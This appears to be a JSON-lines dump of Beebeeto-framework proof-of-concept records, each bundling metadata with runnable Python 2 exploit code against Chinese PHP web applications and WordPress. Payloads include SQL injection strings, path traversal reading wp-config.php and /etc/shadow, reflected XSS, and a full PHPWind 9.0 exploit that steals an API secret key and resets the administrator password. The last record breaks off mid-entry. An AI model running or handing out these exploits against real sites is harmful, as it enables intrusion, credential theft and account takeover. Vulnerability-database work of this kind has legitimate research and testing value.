+{"create_date": "2014-12-19 18:54:19", "name": "\u65b9\u7ef4\u56e2\u8d2d v4.3 /app/source/goods_list.php SQL\u6ce8\u5165\u6f0f\u6d1e POC", "level": "\u4e2d\u5371", "batchable": 1, "author": "beebeeto", "rank": 3, "port": null, "vul_type": "SQL\u6ce8\u5165", "tag": "\u65b9\u7ef4\u56e2\u8d2d4.3\u6f0f\u6d1e,SQL\u6ce8\u5165\u6f0f\u6d1e,/app/source/goods_list.php,php", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\nimport urllib2\r\n\r\nfrom baseframe import BaseFrame\r\n\r\n\r\nclass MyPoc(BaseFrame):\r\n    poc_info = {\r\n        # poc\u76f8\u5173\u4fe1\u606f\r\n        'poc': {\r\n            'id': 'poc-2014-0212',\r\n            'name': '\u65b9\u7ef4\u56e2\u8d2d v4.3 /app/source/goods_list.php SQL\u6ce8\u5165\u6f0f\u6d1e POC',\r\n            'author': 'xiangshou',\r\n            'create_date': '2014-12-19',\r\n        },\r\n        # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n        'protocol': {\r\n            'name': 'http',\r\n            'port': [80],\r\n            'layer4_protocol': ['tcp'],\r\n        },\r\n        # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n        'vul': {\r\n            'app_name': '\u65b9\u7ef4\u56e2\u8d2d',\r\n            'vul_version': ['4.3'],\r\n            'type': 'SQL Injection',\r\n            'tag': ['\u65b9\u7ef4\u56e2\u8d2d4.3\u6f0f\u6d1e', 'SQL\u6ce8\u5165\u6f0f\u6d1e', '/app/source/goods_list.php', 'php'],\r\n            'desc': '\u65b9\u7ef4\u56e2\u8d2d v4.3 /app/source/goods_list.php\uff0cid\u9020\u6210\u4e86\u6ce8\u5165',\r\n            'references': ['http://sebug.net/vuldb/ssvid-87131',\r\n            ],\r\n        },\r\n    }\r\n\r\n\r\n    @classmethod\r\n    def verify(cls, args):\r\n        payload = \"/index.php?m=Goods&a=showcate&id=103%20UNION%20ALL%20SELECT%20CONCAT%28md5%28333%29%29%23\"\r\n        verify_url = args['options']['target'] + payload\r\n        req = urllib2.Request(verify_url)\r\n        if args['options']['verbose']:\r\n            print '[*] Request URL: ' + verify_url\r\n        content = urllib2.urlopen(req).read()\r\n        if '310dcbbf4cce62f762a2aaa148d556bd' in content:\r\n            args['success'] = True\r\n            args['poc_ret']['vul_url'] = verify_url\r\n        return args\r\n\r\n    exploit = verify\r\n\r\n\r\nif __name__ == '__main__':\r\n    from pprint import pprint\r\n\r\n    mp = MyPoc()\r\n    pprint(mp.run())", "desc": "\u65b9\u7ef4\u56e2\u8d2d v4.3 /app/source/goods_list.php\uff0cid\u9020\u6210\u4e86\u6ce8\u5165", "app_name": "\u65b9\u7ef4\u56e2\u8d2d", "id": "poc-2014-0212", "layer4_protocol": null}
+{"create_date": "2014-12-18 20:52:06", "name": "eYou v4 /php/report/include/config.inc \u4fe1\u606f\u6cc4\u9732\u6f0f\u6d1e POC", "level": "\u4e2d\u5371", "batchable": 1, "author": "beebeeto", "rank": 3, "port": null, "vul_type": "\u4fe1\u606f\u6cc4\u6f0f", "tag": "eYou,\u654f\u611f\u4fe1\u606f\u6cc4\u6f0f,/php/report/include/config.inc,php", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\nimport urllib2\r\n\r\nfrom baseframe import BaseFrame\r\n\r\n\r\nclass MyPoc(BaseFrame):\r\n    poc_info = {\r\n        # poc\u76f8\u5173\u4fe1\u606f\r\n        'poc': {\r\n            'id': 'poc-2014-0211',\r\n            'name': 'eYou v4 /php/report/include/config.inc \u4fe1\u606f\u6cc4\u9732\u6f0f\u6d1e POC',\r\n            'author': 'xiangshou',\r\n            'create_date': '2014-12-18',\r\n        },\r\n        # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n        'protocol': {\r\n            'name': 'http',\r\n            'port': [80],\r\n            'layer4_protocol': ['tcp'],\r\n        },\r\n        # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n        'vul': {\r\n            'app_name': 'eyou',\r\n            'vul_version': ['4'],\r\n            'type': 'Information Disclosure',\r\n            'tag': ['eYou', '\u654f\u611f\u4fe1\u606f\u6cc4\u6f0f', '/php/report/include/config.inc', 'php'],\r\n            'desc': '\u6f0f\u6d1e\u6587\u4ef6\uff1a/php/report/include/config.inc',\r\n            'references': ['http://wooyun.org/bugs/wooyun-2014-058462',\r\n            ],\r\n        },\r\n    }\r\n\r\n\r\n    @classmethod\r\n    def verify(cls, args):\r\n        payload = '/php/report/include/config.inc'\r\n        verify_url = args['options']['target'] + payload\r\n        req = urllib2.Request(verify_url)\r\n        if args['options']['verbose']:\r\n            print '[*] Request URL: ' + verify_url\r\n        content = urllib2.urlopen(req).read()\r\n        if 'MYSQL_USER' in content and 'MYSQL_PASS' in content:\r\n            args['success'] = True\r\n            args['poc_ret']['vul_url']= verify_url\r\n        return args\r\n\r\n    exploit = verify\r\n\r\n\r\nif __name__ == '__main__':\r\n    from pprint import pprint\r\n\r\n    mp = MyPoc()\r\n    pprint(mp.run())", "desc": "\u6f0f\u6d1e\u6587\u4ef6\uff1a/php/report/include/config.inc", "app_name": "eYou", "id": "poc-2014-0211", "layer4_protocol": null}
+{"create_date": "2014-12-18 00:53:49", "name": "WordPress DB-Backup Plugin 4.5 /download.php \u4efb\u610f\u6587\u4ef6\u4e0b\u8f7d\u6f0f\u6d1e Exploit", "level": "\u9ad8\u5371", "batchable": 1, "author": "foundu", "rank": 6, "port": null, "vul_type": "\u4efb\u610f\u6587\u4ef6\u4e0b\u8f7d", "tag": "WordPress DB Backup\u6f0f\u6d1e,CVE-2014-9119,\u4efb\u610f\u6587\u4ef6\u4e0b\u8f7d\u6f0f\u6d1e,php", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\nimport urllib2\r\n\r\nfrom baseframe import BaseFrame\r\n\r\n\r\nclass MyPoc(BaseFrame):\r\n    poc_info = {\r\n        # poc\u76f8\u5173\u4fe1\u606f\r\n        'poc': {\r\n            'id': 'poc-2014-0209',\r\n            'name': 'WordPress DB-Backup Plugin 4.5 /download.php \u4efb\u610f\u6587\u4ef6\u4e0b\u8f7d\u6f0f\u6d1e Exploit',\r\n            'author': 'foundu',\r\n            'create_date': '2014-12-18',\r\n        },\r\n        # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n        'protocol': {\r\n            'name': 'http',\r\n            'port': [80],\r\n            'layer4_protocol': ['tcp'],\r\n        },\r\n        # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n        'vul': {\r\n            'app_name': 'WordPress',\r\n            'vul_version': ['4.5'],\r\n            'type': 'Arbitrary File Download',\r\n            'tag': ['WordPress DB Backup\u6f0f\u6d1e', 'CVE-2014-9119', '\u4efb\u610f\u6587\u4ef6\u4e0b\u8f7d\u6f0f\u6d1e', 'php'],\r\n            'desc': '''\r\n                    DB Backup plugin for WordPress contains a flaw that allows traversing outside of\r\n                    a restricted path. The issue is due to the download.php script not properly\r\n                    sanitizing user input, specifically path traversal style attacks (e.g. '../').\r\n                    With a specially crafted request, a remote attacker can gain read access to\r\n                    arbitrary files, limited by system operational access control. This\r\n                    vulnerability can be used to get WordPress authentication keys and salts,\r\n                    database address and credentials, which can be used in certain environments to\r\n                    elevate privileges and execute malicious PHP code.\r\n\r\n                    Root cause:\r\n                    Unsanitized user input to readfile() function.\r\n                    ''',\r\n            'references': ['http://seclists.org/oss-sec/2014/q4/1059',\r\n            ],\r\n        },\r\n    }\r\n\r\n\r\n    @classmethod\r\n    def exploit(cls, args):\r\n        payload = '/wp-content/plugins/db-backup/download.php?file=../../../wp-config.php'\r\n        verify_url = args['options']['target'] + payload\r\n        req = urllib2.Request(verify_url)\r\n        if args['options']['verbose']:\r\n            print '[*] Request URL: ' + verify_url\r\n        content = urllib2.urlopen(req).read()\r\n        if 'DB_PASSWORD' in content and 'wp-settings.php' in content:\r\n            args['success'] = True\r\n            args['poc_ret']['vul_url'] = verify_url\r\n        return args\r\n\r\n    verify = exploit\r\n\r\n\r\nif __name__ == '__main__':\r\n    from pprint import pprint\r\n\r\n    mp = MyPoc()\r\n    pprint(mp.run())", "desc": "DB Backup plugin for WordPress contains a flaw that allows traversing outside of\r\na restricted path. The issue is due to the download.php script not properly\r\nsanitizing user input, specifically path traversal style attacks (e.g. '../').\r\nWith a specially crafted request, a remote attacker can gain read access to\r\narbitrary files, limited by system operational access control. This\r\nvulnerability can be used to get WordPress authentication keys and salts,\r\ndatabase address and credentials, which can be used in certain environments to\r\nelevate privileges and execute malicious PHP code.\r\n\r\nRoot cause:\r\nUnsanitized user input to readfile() function.", "app_name": "WordPress", "id": "poc-2014-0209", "layer4_protocol": null}
+{"create_date": "2014-12-16 20:04:21", "name": "Espcms v5.0 /index.php SQL\u6ce8\u5165\u6f0f\u6d1e POC", "level": "\u4e2d\u5371", "batchable": 1, "author": "H4rdy", "rank": 3, "port": null, "vul_type": "SQL\u6ce8\u5165", "tag": "Espcms 5.0 \u6f0f\u6d1e,SQL\u6ce8\u5165\u6f0f\u6d1e,/index.php,php", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\nimport re\r\nimport urllib2\r\n\r\nfrom baseframe import BaseFrame\r\n\r\n\r\nclass MyPoc(BaseFrame):\r\n    poc_info = {\r\n        # poc\u76f8\u5173\u4fe1\u606f\r\n        'poc': {\r\n            'id': 'poc-2014-0208',\r\n            'name': 'Espcms v5.0 /index.php SQL\u6ce8\u5165\u6f0f\u6d1e POC',\r\n            'author': 'H4rdy',\r\n            'create_date': '2014-12-16',\r\n        },\r\n        # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n        'protocol': {\r\n            'name': 'http',\r\n            'port': [80],\r\n            'layer4_protocol': ['tcp'],\r\n        },\r\n        # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n        'vul': {\r\n            'app_name': 'Espcms',\r\n            'vul_version': ['5.0'],\r\n            'type': 'SQL Injection',\r\n            'tag': ['Espcms 5.0 \u6f0f\u6d1e', 'SQL\u6ce8\u5165\u6f0f\u6d1e', '/index.php', 'php'],\r\n            'desc': 'Espcms v5.0 /index.php\uff0ctagkey\u9020\u6210\u4e86\u6ce8\u5165',\r\n            'references': ['http://www.wooyun.org/bugs/wooyun-2013-019995',\r\n            ],\r\n        },\r\n    }\r\n\r\n\r\n    @classmethod\r\n    def verify(cls, args):\r\n        payload = (\"/index.php?ac=search&at=taglist&tagkey=%2527,tags%29%20or%28select%201%20from%28select\"\r\n                   \"%20count%28*%29,concat%28%28select%20%28select%20concat%28md5%283.1415%29%29%29%20from\"\r\n                   \"%20information_schema.tables%20where%20table_schema=database%28%29%20limit%200,1%29,\"\r\n                   \"floor%28rand%280%29*2%29%29x%20from%20information_schema.tables%20group%20by%20x%29a%29%23\")\r\n        verify_url = args['options']['target'] + payload\r\n        req = urllib2.Request(verify_url)\r\n        if args['options']['verbose']:\r\n            print '[*] Request URL: ' + verify_url\r\n        content = urllib2.urlopen(req).read()\r\n        if \"63e1f04640e83605c1d177544a5a0488\" in content:\r\n            args['success'] = True\r\n            args['poc_ret']['vul_url'] = verify_url\r\n        return args\r\n\r\n    exploit = verify\r\n\r\n\r\nif __name__ == '__main__':\r\n    from pprint import pprint\r\n\r\n    mp = MyPoc()\r\n    pprint(mp.run())", "desc": "Espcms v5.0 /index.php\uff0ctagkey\u9020\u6210\u4e86\u6ce8\u5165", "app_name": "Espcms", "id": "poc-2014-0208", "layer4_protocol": null}
+{"create_date": "2014-12-16 18:28:31", "name": "NS-ASG /commonplugin-Download.php \u4efb\u610f\u6587\u4ef6\u4e0b\u8f7d\u6f0f\u6d1e POC", "level": "\u9ad8\u5371", "batchable": 1, "author": "beebeeto", "rank": 3, "port": null, "vul_type": "\u4efb\u610f\u6587\u4ef6\u4e0b\u8f7d", "tag": "NS-ASG\u6f0f\u6d1e,\u4efb\u610f\u6587\u4ef6\u4e0b\u8f7d\u6f0f\u6d1e,/commonplugin-Download.php,php", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\nimport urllib2\r\n\r\nfrom baseframe import BaseFrame\r\n\r\n\r\nclass MyPoc(BaseFrame):\r\n    poc_info = {\r\n        # poc\u76f8\u5173\u4fe1\u606f\r\n        'poc': {\r\n            'id': 'poc-2014-0207',\r\n            'name': 'NS-ASG /commonplugin-Download.php \u4efb\u610f\u6587\u4ef6\u4e0b\u8f7d\u6f0f\u6d1e POC',\r\n            'author': 'xiangshou',\r\n            'create_date': '2014-12-15',\r\n        },\r\n        # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n        'protocol': {\r\n            'name': 'http',\r\n            'port': [80],\r\n            'layer4_protocol': ['tcp'],\r\n        },\r\n        # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n        'vul': {\r\n            'app_name': 'NS-ASG',\r\n            'vul_version': '*',\r\n            'type': 'Arbitrary File Download',\r\n            'tag': ['NS-ASG\u6f0f\u6d1e', '\u4efb\u610f\u6587\u4ef6\u4e0b\u8f7d\u6f0f\u6d1e', '/commonplugin-Download.php', 'php'],\r\n            'desc': 'N/A',\r\n            'references': ['http://wooyun.org/bugs/wooyun-2014-058838',\r\n            ]\r\n        },\r\n    }\r\n\r\n\r\n    @classmethod\r\n    def verify(cls, args):\r\n        payload = '/commonplugin/Download.php?licensefile=../../../../../../../../../../etc/shadow'\r\n        verify_url = args['options']['target'] + payload\r\n        req = urllib2.Request(verify_url)\r\n        if args['options']['verbose']:\r\n            print '[*] Request URL: ' + verify_url\r\n        content = urllib2.urlopen(req).read()\r\n        if 'root:' in content and 'nobody:' in content:\r\n            args['success'] = True\r\n            args['poc_ret']['vul_url'] = verify_url\r\n        return args\r\n\r\n\r\n    exploit = verify\r\n\r\n\r\nif __name__ == '__main__':\r\n    from pprint import pprint\r\n\r\n    mp = MyPoc()\r\n    pprint(mp.run())", "desc": "N/A", "app_name": "Other", "id": "poc-2014-0207", "layer4_protocol": null}
+{"create_date": "2014-12-13 00:54:14", "name": "PHPWind 9.0 /src/windid/service/user/srv/WindidUserService.php \u8fdc\u7a0b\u5bc6\u7801\u4fee\u6539\u6f0f\u6d1e POC & Exploit", "level": "\u9ad8\u5371", "batchable": 0, "author": "Evi1m0", "rank": 7, "port": null, "vul_type": "\u8fdc\u7a0b\u5bc6\u7801\u4fee\u6539", "tag": "phpwind\u6f0f\u6d1e,\u8fdc\u7a0b\u5bc6\u7801\u4fee\u6539\u6f0f\u6d1e,/WindidUserService.php,php", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\nimport re\r\nimport time\r\nimport json\r\nimport urllib\r\nimport urllib2\r\n\r\n\r\nfrom hashlib import md5\r\n\r\nfrom baseframe import BaseFrame\r\n\r\n\r\nclass MyPoc(BaseFrame):\r\n    poc_info = {\r\n        # poc\u76f8\u5173\u4fe1\u606f\r\n        'poc': {\r\n            'id': 'poc-2014-0204',\r\n            'name': 'PHPWind 9.0 /src/windid/service/user/srv/WindidUserService.php \u8fdc\u7a0b\u5bc6\u7801\u4fee\u6539\u6f0f\u6d1e POC & Exploit',\r\n            'author': 'Evi1m0',\r\n            'create_date': '2014-12-13',\r\n        },\r\n        # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n        'protocol': {\r\n            'name': 'http',\r\n            'port': [80],\r\n            'layer4_protocol': ['tcp'],\r\n        },\r\n        # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n        'vul': {\r\n            'app_name': 'phpwind',\r\n            'vul_version': ['9.0'],\r\n            'type': 'Remote Password Change',\r\n            'tag': ['phpwind\u6f0f\u6d1e', '\u8fdc\u7a0b\u5bc6\u7801\u4fee\u6539\u6f0f\u6d1e', '/WindidUserService.php', 'php'],\r\n            'desc': '''\r\n                    phpwind v9.0\u7248\u672c\u4e2d\u4e0a\u4f20\u5934\u50cf\u5904\u8bef\u5c06\u8bbf\u95eeapi\u7684\u5bc6\u94a5\u6cc4\u9732\uff0c\u5bfc\u81f4 secretkey \u6cc4\u9732\uff0c\u5bfc\u81f4\u53ef\u901a\u8fc7api\u4efb\u610f\u4fee\u6539\u5bc6\u7801\u3002\r\n                    ''',\r\n            'references': ['http://www.wooyun.org/bugs/wooyun-2014-072727',\r\n            ],\r\n        },\r\n    }\r\n\r\n\r\n    # The need for -c (cookie) parameters\r\n    def _init_user_parser(self):\r\n        self.user_parser.add_option('-c','--cookie',\r\n                                    action='store', dest='cookie', type='string', default=None,\r\n                                    help='this poc need to login, so special cookie '\r\n                                    'for target must be included in http headers.')\r\n\r\n\r\n    @classmethod\r\n    def verify(cls, args):\r\n        url = args['options']['target']\r\n        headers_cookie = {\"Cookie\":args['options']['cookie']}\r\n        windidkey_url = '%s/index.php?m=profile&c=avatar&_left=avatar' % url\r\n        secretkey_url = '%s/windid/index.php?m=api&c=app&a=list&uid=%s&windidkey=%s&time=%s&clientid=1&type=flash'\r\n        # Regex\r\n        match_uid = re.compile('m=space&uid=([\\d])+')\r\n        match_windidkey = re.compile('windidkey%3D([\\w\\d]{32})%26time%3D([\\d]+)%26')\r\n        if args['options']['verbose']:\r\n            print '[*] %s - Trying to get secret key' % url\r\n        request = urllib2.Request(windidkey_url, headers=headers_cookie)\r\n        response = urllib2.urlopen(request).read()\r\n\r\n        # Get windidkey\r\n        try:\r\n            windidkey, _time = match_windidkey.findall(response)[0]\r\n            uid = match_uid.findall(response)[0]\r\n        except:\r\n            return args\r\n\r\n        # Get secretkey\r\n        request = urllib2.Request(secretkey_url % (url, uid, windidkey, _time), data='uid=undefined')\r\n        response = json.loads(urllib2.urlopen(request).read())\r\n        try:\r\n            secretkey = response['1']['secretkey']\r\n        except:\r\n            return args\r\n\r\n        # Success\r\n        if secretkey:\r\n            args['success'] = True\r\n            args['poc_ret']['vul_url'] = url\r\n            args['poc_ret']['secretkey'] = secretkey\r\n        return args\r\n\r\n\r\n    @classmethod\r\n    def exploit(cls, args):\r\n        url = args['options']['target']\r\n        headers_cookie = {\"Cookie\":args['options']['cookie']}\r\n        vul_url = '%s/windid/index.php?m=api&c=user&a=%s&windidkey=%s&time=%s&clientid=1&userid=1'\r\n        windidkey_url = '%s/index.php?m=profile&c=avatar&_left=avatar' % url\r\n        secretkey_url = '%s/windid/index.php?m=api&c=app&a=list&uid=%s&windidkey=%s&time=%s&clientid=1&type=flash'\r\n        # Regex\r\n        match_uid = re.compile('m=space&uid=([\\d])+')\r\n        match_windidkey = re.compile('windidkey%3D([\\w\\d]{32})%26time%3D([\\d]+)%26')\r\n        if args['options']['verbose']:\r\n            print '[*] %s - Trying to get secret key' % url\r\n        request = urllib2.Request(windidkey_url, headers=headers_cookie)\r\n        response = urllib2.urlopen(request).read()\r\n\r\n        # Get windidkey\r\n        try:\r\n            windidkey, _time = match_windidkey.findall(response)[0]\r\n            uid = match_uid.findall(response)[0]\r\n        except:\r\n            return args\r\n\r\n        # Get secretkey\r\n        request = urllib2.Request(secretkey_url % (url, uid, windidkey, _time), data='uid=undefined')\r\n        response = json.loads(urllib2.urlopen(request).read())\r\n        try:\r\n            secretkey = response['1']['secretkey']\r\n        except:\r\n            return args\r\n        if args['options']['verbose']:\r\n            print '[*] %s - The secret key is %s' % (url, secretkey)\r\n\r\n        # Get username\r\n        if args['options']['verbose']:\r\n            print '[*] %s - Getting Username ...' % url\r\n        data = {'uid': 1}\r\n        string = 'userid1uid1'\r\n        _time = str(int(time.time()))\r\n        app_key = md5('%s%s%s' % (md5('1||%s' % secretkey).hexdigest(), _time, string)).hexdigest()\r\n        request = urllib2.Request(vul_url % (url, 'get', app_key, _time), data=urllib.urlencode(data))\r\n        response = json.loads(urllib2.urlopen(request).read())\r\n        try:\r\n            username = response[u'username']\r\n        except:\r\n            return args\r\n        if args['options']['verbose']:\r\n            print '[*] %s - The Username is %s' % (url, username)\r\n\r\n        # Change password\r\n        if args['options']['verbose']:\r\n            print '[*] %s - Trying to change the %s\\'s password ...' % (url ,username)\r\n        data = {'password': 'PASSW0RD', 'uid': 1}\r\n        string = 'userid1passwordPASSW0RDuid1'\r\n        _time = str(int(time.time()))\r\n        app_key = md5('%s%s%s' % (md5('1||%s' % secretkey).hexdigest(), _time, string)).hexdigest()\r\n        request = urllib2.Request(vul_url % (url, 'editUser', app_key, _time), data=urllib.urlencode(data))\r\n        response = urllib2.urlopen(request).read()\r\n\r\n        # Success\r\n        if response == '1':\r\n            args['success'] = True\r\n            args['poc_ret']['vul_url'] = url\r\n            args['poc_ret']['secretkey'] = secretkey\r\n            args['poc_ret']['username'] = username\r\n            args['poc_ret']['password'] = 'PASSW0RD'\r\n        return args\r\n\r\n\r\n\r\nif __name__ == '__main__':\r\n    from pprint import pprint\r\n\r\n    mp = MyPoc()\r\n    pprint(mp.run())", "desc": "phpwind v9.0\u7248\u672c\u4e2d\u4e0a\u4f20\u5934\u50cf\u5904\u8bef\u5c06\u8bbf\u95eeapi\u7684\u5bc6\u94a5\u6cc4\u9732\uff0c\u5bfc\u81f4 secretkey \u6cc4\u9732\uff0c\u5bfc\u81f4\u53ef\u901a\u8fc7api\u4efb\u610f\u4fee\u6539\u5bc6\u7801\u3002", "app_name": "PHPWind", "id": "poc-2014-0204", "layer4_protocol": null}
+{"create_date": "2014-12-11 01:09:34", "name": "phpwind 9.0 /res/js/dev/util_libs/jPlayer/Jplayer.swf \u8de8\u7ad9\u811a\u672c\u6f0f\u6d1e POC", "level": "\u4f4e\u5371", "batchable": 1, "author": "tmp", "rank": 1, "port": null, "vul_type": "\u8de8\u7ad9\u6f0f\u6d1e", "tag": "phpwind\u6f0f\u6d1e,xss\u6f0f\u6d1e,flash xss,php", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\nimport md5\r\nimport urllib2\r\n\r\nfrom baseframe import BaseFrame\r\n\r\n\r\nclass MyPoc(BaseFrame):\r\n    poc_info = {\r\n        # poc\u76f8\u5173\u4fe1\u606f\r\n        'poc': {\r\n            'id': 'poc-2014-0201',\r\n            'name': 'phpwind 9.0 /res/js/dev/util_libs/jPlayer/Jplayer.swf \u8de8\u7ad9\u811a\u672c\u6f0f\u6d1e POC',\r\n            'author': 'tmp',\r\n            'create_date': '2014-12-11',\r\n        },\r\n        # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n        'protocol': {\r\n            'name': 'http',\r\n            'port': [80],\r\n            'layer4_protocol': ['tcp'],\r\n        },\r\n        # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n        'vul': {\r\n            'app_name': 'phpwind',\r\n            'vul_version': ['9.0'],\r\n            'type': 'Cross Site Scripting',\r\n            'tag': ['phpwind\u6f0f\u6d1e', 'xss\u6f0f\u6d1e', 'flash xss', 'php'],\r\n            'desc': 'N/A',\r\n            'references': ['http://wooyun.org/bugs/wooyun-2013-017733',\r\n            ],\r\n        },\r\n    }\r\n\r\n    @classmethod\r\n    def verify(cls, args):\r\n        flash_md5 = \"769d053b03973d380da80be5a91c59c2\"\r\n        file_path = \"/res/js/dev/util_libs/jPlayer/Jplayer.swf\"\r\n        verify_url = args['options']['target'] + file_path\r\n\r\n        if args['options']['verbose']:\r\n            print '[*] Request URL: ' + verify_url\r\n\r\n        request = urllib2.Request(verify_url)\r\n        response = urllib2.urlopen(request)\r\n        content = response.read()\r\n        md5_value = md5.new(content).hexdigest()\r\n\r\n        if md5_value in flash_md5:\r\n            args['success'] = True\r\n            args['poc_ret']['xss_url'] = verify_url + '?jQuery=alert(1))}catch(e){}//'\r\n            return args\r\n        return args\r\n\r\n    exploit = verify\r\n\r\n\r\nif __name__ == '__main__':\r\n    from pprint import pprint\r\n\r\n    mp = MyPoc()\r\n    pprint(mp.run())", "desc": "N/A", "app_name": "phpcms", "id": "poc-2014-0201", "layer4_protocol": null}
+{"create_date": "2014-12-11 01:02:34", "name": "phpwind 9.0 \u8c9d\u5854 \u53cd\u5c04XSS\u6f0f\u6d1e POC", "level": "\u4f4e\u5371", "batchable": 1, "author": "\u6211\u53ea\u4f1a\u6253\u8fde\u8fde\u770b", "rank": 1, "port": null, "vul_type": "\u8de8\u7ad9\u6f0f\u6d1e", "tag": "phpwind\u6f0f\u6d1e,xss\u6f0f\u6d1e,/index.php,php", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\nimport urllib2\r\n\r\nfrom baseframe import BaseFrame\r\n\r\n\r\nclass MyPoc(BaseFrame):\r\n    poc_info = {\r\n        # poc\u76f8\u5173\u4fe1\u606f\r\n        'poc': {\r\n            'id': 'poc-2014-0200',\r\n            'name': 'phpwind 9.0 \u8c9d\u5854 \u53cd\u5c04XSS\u6f0f\u6d1e POC',\r\n            'author': '\u6211\u53ea\u4f1a\u6253\u8fde\u8fde\u770b',\r\n            'create_date': '2014-12-11',\r\n        },\r\n        # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n        'protocol': {\r\n            'name': 'http',\r\n            'port': [80],\r\n            'layer4_protocol': ['tcp'],\r\n        },\r\n        # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n        'vul': {\r\n            'app_name': 'phpwind',\r\n            'vul_version': ['9.0'],\r\n            'type': 'Cross Site Scripting',\r\n            'tag': ['phpwind\u6f0f\u6d1e', 'xss\u6f0f\u6d1e', '/index.php', 'php'],\r\n            'desc': '\u6f0f\u6d1e\u6587\u4ef6\uff1aindex.php',\r\n            'references': ['http://wooyun.org/bugs/wooyun-2012-012163',\r\n            ],\r\n        },\r\n    }\r\n\r\n\r\n    @classmethod\r\n    def verify(cls, args):\r\n        payload = '/index.php?m=1%22%3E%3Cscript%3Ealert%28%22bb2%22%29%3C%2Fscript%3E%26c%3Dforum'\r\n        verify_url = args['options']['target'] + payload\r\n        req = urllib2.Request(verify_url)\r\n        if args['options']['verbose']:\r\n            print '[*] Request URL: ' + verify_url\r\n        try:\r\n            content = urllib2.urlopen(req).read()\r\n        except urllib2.URLError, e:\r\n            content = e.read()\r\n            if '<script>alert(\"bb2\")</script>' in content:\r\n                args['success'] = True\r\n                args['poc_ret']['vul_url'] = verify_url\r\n            return args\r\n        return args\r\n\r\n    exploit = verify\r\n\r\n\r\nif __name__ == '__main__':\r\n    from pprint import pprint\r\n\r\n    mp = MyPoc()\r\n    pprint(mp.run())", "desc": "\u6f0f\u6d1e\u6587\u4ef6\uff1aindex.php", "app_name": "PHPWind", "id": "poc-2014-0200", "layer4_protocol": null}
+{"create_date": "2014-12-11 00:54:22", "name": "phpwind 9.0 /res/js/dev/util_libs/swfupload/Flash/swfupload.swf \u8de8\u7ad9\u811a\u672c\u6f0f\u6d1e POC", "level": "\u4f4e\u5371", "batchable": 1, "author": "tmp", "rank": 2, "port": null, "vul_type": "\u8de8\u7ad9\u6f0f\u6d1e", "tag": "phpwind\u6f0f\u6d1e,xss\u6f0f\u6d1e,flash xss,php", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\nimport md5\r\nimport urllib2\r\n\r\nfrom baseframe import BaseFrame\r\n\r\n\r\nclass MyPoc(BaseFrame):\r\n    poc_info = {\r\n        # poc\u76f8\u5173\u4fe1\u606f\r\n        'poc': {\r\n            'id': 'poc-2014-0199',\r\n            'name': 'phpwind 9.0 /res/js/dev/util_libs/swfupload/Flash/swfupload.swf \u8de8\u7ad9\u811a\u672c\u6f0f\u6d1e POC',\r\n            'author': 'tmp',\r\n            'create_date': '2014-12-11',\r\n        },\r\n        # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n        'protocol': {\r\n            'name': 'http',\r\n            'port': [80],\r\n            'layer4_protocol': ['tcp'],\r\n        },\r\n        # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n        'vul': {\r\n            'app_name': 'phpwind', \r\n            'vul_version': ['9.0'],\r\n            'type': 'Cross Site Scripting',\r\n            'tag': ['phpwind\u6f0f\u6d1e', 'xss\u6f0f\u6d1e', 'flash xss', 'php'],\r\n            'desc': 'http://packetstormsecurity.com/files/118059/SWF-Upload-Cross-Site-Scripting.html',\r\n            'references': ['http://wooyun.org/bugs/wooyun-2013-017731',\r\n            ],\r\n        },\r\n    }\r\n\r\n    